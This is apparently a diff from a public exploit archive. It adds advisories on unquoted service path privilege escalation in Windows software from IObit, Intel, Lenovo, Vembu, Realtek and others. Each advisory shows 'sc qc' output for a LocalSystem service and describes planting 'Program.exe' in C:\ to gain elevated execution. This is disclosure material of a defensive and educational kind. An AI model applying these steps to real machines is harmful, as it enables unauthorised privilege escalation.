# Date: 13/10/2016
# Author: Amir.ght
# Vendor Homepage: https://www.hotspotshield.com
# Software Link:
https://www.hotspotshield.com/download/
#version : 6.0.3 (Latest)
# Software Link: https://www.hotspotshield.com/download/
# version : 6.0.3 (Latest)
# Tested on: Windows 7
##########################################################################

8
platforms/windows/local/40539.txt
View file

@ -1,12 +1,10 @@
#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path
Privilege Escalation
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=4
#version : build 16.0.205 (Latest)
# Software Link: http://www.netgate.sk/download/download.php?id=4
# Version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################

8
platforms/windows/local/40540.txt
View file

@ -1,12 +1,10 @@
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path
Privilege Escalation
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=11
#version : build 23.0.305 (Latest)
# Software Link: http://www.netgate.sk/download/download.php?id=11
# Version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################

33
platforms/windows/local/40577.txt Executable file
View file

@ -0,0 +1,33 @@
#########################################################################
# Exploit Title: IObit Advanced SystemCare Unquoted Service Path Privilege Escalation
# Date: 19/10/2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: http://www.iobit.com/en/advancedsystemcarefree.php#
# version : 10.0.2 (Latest)
# Tested on: Windows 7
##########################################################################
IObit Advanced SystemCare installs a service with an unquoted service path
To properly exploit this vulnerability, the local attacker must insert
an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AdvancedSystemCareService10
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService10
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\IObit\Advanced SystemCare\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 1
DISPLAY_NAME : Advanced SystemCare Service 10
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
################################################
######### Ashiyane Digital Security Team ############
########## exploit by: Amir.ght #####################
################################################

51
platforms/windows/local/40579.txt Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 8.0.1.1399
# Tested on: Windows 7 Professional
The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 8.0.1.1399, but other versions may be affected
as well.
---------------------------------------------------------------------------
C:\>sc qc LMS
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LMS
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intel(R) Management and Security Application Local Management Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

39
platforms/windows/local/40580.txt Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: Lenovo RapidBoot HDD Accelerator - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.00.0802
# Tested on: Windows 7 Professional
The Lenovo RapidBoot HDD Accelerator service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.00.0802, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc FastbootService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FastbootService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FastbootService
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

50
platforms/windows/local/40581.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Lenovo Slim USB Keyboard - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 1.09
# Tested on: Windows 7 Professional
The Lenovo Slim USB Keyboard service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 1.09, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc Sks8821
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Sks8821
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Skdaemon Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

78
platforms/windows/local/40582.txt Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: Vembu StoreGrid - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 4.0
# Tested on: Windows Server 2012
StoreGrid is a re-brandable backup solution, which can install 2 services with unquoted service paths.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 4.0, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RemoteBackup
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\bin\StoreGrid.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc RemoteBackup_webServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteBackup_webServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\MSP\RemoteBackup\apache\Apache.exe -k runservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : RemoteBackup_WebServer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

49
platforms/windows/local/40583.txt Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 15.1.0.0096
# Tested on: Windows 7 Professional
The Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed service is installed with an unquoted service path.
This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
This was tested on version 15.1.0.0096, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc AMPPALR3
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AMPPALR3
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Intelr Centrinor Wireless Bluetoothr + High Speed Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

55
platforms/windows/local/40585.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Lenovo ThinkVantage Communications Utility - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 3.0.42.0
# Tested on: Windows 7 Professional
The Lenovo ThinkVantage Communications Utility installs 2 services with unquoted
service paths. This enables a local privilege escalation vulnerability.
To exploit this vulnerability, a local attacker can insert an executable file in the path
of either service. Rebooting the system or restarting either service will run the malicious
executable with elevated privileges.
This was tested on version 3.0.42.0, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc LENOVO.CAMMUTE
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LENOVO.CAMMUTE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\CAMMUTE.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Lenovo Camera Mute
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc LENOVO.TPKNRSVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: LENOVO.TPKNRSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Lenovo Keyboard Noise Reduction
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

41
platforms/windows/local/40586.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: PDF Complete Corporate Edition - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Software Link: http://www.pdfcomplete.com/cms/Downloads.aspx
# Version: 4.1.12
# Tested on: Windows 7 Professional
PDF Complete Corporate Edition installs a service with an unquoted service path.
This enables a local privilege escalation vulnerability. To exploit this vulnerability,
a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable
with elevated privileges.
This was tested on version 4.1.12, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc pdfcDispatcher
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: pdfcDispatcher
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\PDF Complete\pdfsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PDF Document Manager
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.

40
platforms/windows/local/40587.txt Executable file
View file

@ -0,0 +1,40 @@
# Exploit Title: Realtek High Definition Audio Driver - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 6.0.1.6730
# Tested on: Windows 7 Professional
The Realtek High Definition Audio Driver installs a service with an unquoted service path.
This enables a local privilege escalation vulnerability. To exploit this vulnerability,
a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable
with elevated privileges.
This was tested on version 6.0.1.6730, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RtkAudioService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RtkAudioService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
LOAD_ORDER_GROUP : PlugPlay
TAG : 0
DISPLAY_NAME : Realtek Audio Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.